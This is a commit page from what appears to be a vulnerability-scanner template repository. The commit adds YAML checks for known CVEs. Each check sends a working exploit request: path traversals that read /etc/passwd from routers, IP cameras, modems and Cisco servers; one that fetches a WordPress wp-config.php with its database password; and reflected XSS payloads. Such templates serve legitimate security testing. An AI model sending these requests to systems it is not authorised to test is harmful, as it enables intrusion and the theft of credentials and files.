Adding new templates (8.4.2)

daffainfo · Jul 27, 2021 · 313ccd4 · 313ccd4
1 parent 22df30d
commit 313ccd4
Show file tree

Hide file tree

Showing 29 changed files with 559 additions and 9 deletions.
diff --git a/CVE-2009-1558.yaml b/CVE-2009-1558.yaml
@@ -17,7 +17,7 @@ requests:
     matchers:
       - type: regex
         regex:
-          - "root:[x*]:0:0"
+          - "root:.*:0:0"
 
       - type: status
         status:

diff --git a/CVE-2010-2307.yaml b/CVE-2010-2307.yaml
@@ -0,0 +1,26 @@
+id: CVE-2010-2307
+
+info:
+  name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
+  reference: |
+    - https://www.securityfocus.com/bid/40550/info
+    - https://nvd.nist.gov/vuln/detail/CVE-2010-2307
+  tags: cve,cve2010,iot,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2010-4231.yaml b/CVE-2010-4231.yaml
@@ -0,0 +1,26 @@
+id: CVE-2010-4231
+
+info:
+  name: Camtron CMNC-200 IP Camera - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
+  reference: |
+    - https://nvd.nist.gov/vuln/detail/CVE-2010-4231
+    - https://www.exploit-db.com/exploits/15505
+  tags: cve,cve2010,iot,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2011-1669.yaml b/CVE-2011-1669.yaml
@@ -20,7 +20,7 @@ requests:
 
       - type: regex
         regex:
-          - "root:[x*]:0:0"
+          - "root:.*:0:0"
 
       - type: status
         status:

diff --git a/CVE-2011-3315.yaml b/CVE-2011-3315.yaml
@@ -0,0 +1,25 @@
+id: CVE-2011-3315
+
+info:
+  name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
+  reference: https://www.exploit-db.com/exploits/36256
+  tags: cve,cve2011,lfi,cisco
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2012-4889.yaml b/CVE-2012-4889.yaml
@@ -0,0 +1,32 @@
+id: CVE-2012-4889
+
+info:
+  name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
+  reference: |
+    - https://www.securityfocus.com/bid/52841/info
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-4889
+  tags: cve,cve2012,xss,manageengine
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '</script><script>alert(document.domain)</script>'
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2013-5528.yaml b/CVE-2013-5528.yaml
@@ -0,0 +1,25 @@
+id: CVE-2013-5528
+
+info:
+  name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
+  reference: https://www.exploit-db.com/exploits/40887
+  tags: cve,cve2013,lfi,cisco
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2013-7240.yaml b/CVE-2013-7240.yaml
@@ -0,0 +1,31 @@
+id: CVE-2013-7240
+
+info:
+  name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
+  reference: |
+        - https://www.exploit-db.com/exploits/38936
+        - https://nvd.nist.gov/vuln/detail/CVE-2013-7240
+  tags: cve,cve2013,wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+          - "DB_HOST"
+          - "The base configurations of the WordPress"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2014-2962.yaml b/CVE-2014-2962.yaml
@@ -0,0 +1,25 @@
+id: CVE-2014-2962
+
+info:
+  name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
+  reference: https://www.exploit-db.com/exploits/38488
+  tags: cve,cve2014,lfi,router
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2014-6308.yaml b/CVE-2014-6308.yaml
@@ -0,0 +1,24 @@
+id: CVE-2014-6308
+
+info:
+  name: Osclass Security Advisory 3.4.1 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
+  tags: cve,cve2014,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2015-1000012.yaml b/CVE-2015-1000012.yaml
@@ -18,7 +18,7 @@ requests:
     matchers:
       - type: regex
         regex:
-          - "root:[0*]:0:0"
+          - "root:.*:0:0"
         part: body
       - type: status
         status:

diff --git a/CVE-2015-9480.yaml b/CVE-2015-9480.yaml
@@ -18,7 +18,7 @@ requests:
     matchers:
       - type: regex
         regex:
-          - "root:[0*]:0:0"
+          - "root:.*:0:0"
         part: body
       - type: status
         status:

diff --git a/CVE-2016-1000126.yaml b/CVE-2016-1000126.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000126
+
+info:
+  name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2016-1000127.yaml b/CVE-2016-1000127.yaml
@@ -0,0 +1,30 @@
+id: CVE-2016-1000127
+
+info:
+  name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin ajax-random-post v2.00
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2016-1000137.yaml b/CVE-2016-1000137.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000137
+
+info:
+  name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/CVE-2016-1000138.yaml b/CVE-2016-1000138.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000138
+
+info:
+  name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200